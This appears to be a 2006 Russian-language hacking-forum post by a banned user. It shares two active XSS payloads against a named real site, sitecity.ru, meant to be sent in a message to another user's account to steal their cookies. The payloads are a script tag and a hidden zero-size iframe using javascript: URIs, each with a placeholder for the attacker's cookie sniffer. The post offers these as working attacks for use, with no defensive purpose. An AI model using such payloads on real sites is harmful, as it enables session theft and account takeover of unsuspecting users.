26.05.2006, 22:24
|
|
Banned
Регистрация: 04.12.2005
Сообщений: 826
С нами:
10754246
Репутация:
3813
|
|
Имеем аккаунт на sitecity.ru (активная XSS)
Вот две XSS, позволяющие стянуть кукисы с помощью ядовитого письма. (отсылается, когда заходишь под своим аккаунтоми - шлёшь на чужой логин)
<script src="javascript:alert(/ваш сниффер/);"></script>
<iframe BORDER=0 HEIGHT=0 WIDTH=0 src="javascript:alert(/для сниффера тоже/);"></iframe>
|
|
|